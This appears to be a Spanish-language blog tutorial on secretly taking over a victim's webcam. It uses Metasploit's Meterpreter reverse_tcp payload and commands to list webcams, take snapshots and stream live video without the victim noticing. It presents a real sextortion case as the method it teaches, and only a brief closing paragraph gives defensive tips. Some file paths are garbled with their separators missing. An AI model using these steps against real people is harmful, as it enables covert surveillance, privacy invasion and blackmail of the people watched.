Cómo hackear cámaras web de forma remota

En este tutorial veremos cómo podemos hackear cámaras web de forma secreta y remota en Internet y echar un vistazo a lo que ocurre al otro lado.Utilizaremos el potenteMeterpreteryKali Linux para hackear la cámara web de la víctima.

>Vamos a tomar el control total de la webcam, encenderla, obtener instantáneas e incluso transmitir vídeo en directo sin que nadie se dé cuenta.

A principios de 2014, un hacker fue condenado a 18 meses por hacer esto en Miss Teen USA 2013. Encontró una vulnerabilidad en el ordenador (como un software obsoleto), tomó algunas fotos comprometedoras de la cámara web y chantajeó a la víctima para que enviara más.Fotos.El método que utilizó es exactamente el que vamos a probar aquí.

Nuestro mejor amigo meterpreter nos ayudará con este hackeo.Con Meterpreter , podemos controlar la cámara web de alguien, instalar un keylogger o bloquear sus propios virus, robar datos privados y hacer casi cualquier cosa en el ordenador de la víctima.

Para este tutorial, asumo que ya has utilizado un módulo de ataque para explotar una vulnerabilidad utilizando Metasploit (¿Cómo hacerlo?).Ahora vamos.

¿Cómo hackear cámaras web de forma remota?

Paso 1: Configurar meterpreter

Después de haber explotado con éxito a la víctima, ahora tenemos la opción de definir un payload de nuestra elección.El payload le dice a metasploit lo que debe hacer en el ordenador de la víctima una vez que haya entrado.Meterpreter es nuestro payload.El siguiente comando configura nuestro payload:

set payload windows meterpreter reverse_tcp

Si el ataque ha tenido éxito, metasploit instala automáticamente meterpreter en el sistema objetivo y podemos proceder a hackear la cámara web .

Paso 2: Encuentra la cámara web

Meterpreter tiene un módulo integrado para encontrar y controlar la cámara web del sistema remoto.Podemos empezar por buscar si el sistema tiene o no una cámara web.Para ello se utiliza el siguiente comando, que también devuelve el nombre de la cámara web.

meterpreter> webcam_list

Y ahora deberías ver tu(s) cámara(s) web de destino en la lista de salida.

Paso 3: Toma instantáneas

Si el último pedido nos dio una cámara web, podemos seguir adelante y hacer una foto:

meterpreter> webcam_snap

Y ahora deberías ver que se ha guardado una imagen en la carpeta opt framework3 msf3 Sólo tienes que ir allí

Paso 4: Transmitir vídeo en tiempo real desde la webcam hackeada

Acabamos de hacer una foto, veamos cómo obtener una transmisión de vídeo en directo.Podemos hacerlo escribiendo el siguiente comando: (Utilizamos el parámetro -p para especificar el directorio que queremos dar al archivo de transmisión de vídeo)

meterpreter> run webcam -p var www

Este comando activa la cámara web de la víctima y envía su salida de vídeo a varwwwwebcam.htm. Puedes abrir este archivo y comprobar lo que ocurre al otro lado en una transmisión de vídeo en directo.

¿Cómo evitar que pirateen tu propia webcam?

Hay varias formas de hackear cámaras web En el ejemplo anterior, con sólo unos pequeños comandos, podemos echar un vistazo a la cámara web de nuestra víctima.Cualquier experto en seguridad te dirá que ningún sistema es completamente seguro.

Por eso debes mantener siempre tus cámaras cubiertas cuando no las utilices.Personalmente, utilizo este pequeí±o artilugio en mi portátil y en mi smartphone.

Pero eso no significa que no debas preocuparte por mantener tu sistema operativo y tus aplicaciones actualizadas, sino todo lo contrario.Si un hacker puede tomar el control de tu cámara web, tu sistema ha sido explotado con éxito, se ha convertido efectivamente en un bot, un esclavo del atacante.

Esto significa que el atacante puede hacer cualquier cosa en tu sistema: acceder a tus datos privados, ver todo lo que escribes y todos los sitios web que visitas.

Conclusión:

Espero que hayas utilizado nuestro Cómo hackear cámaras web a distancia , ¿verdad?

Si tienes alguna duda al respecto, no olvides dejar un comentario abajo.Me pondré en contacto contigo lo antes posible.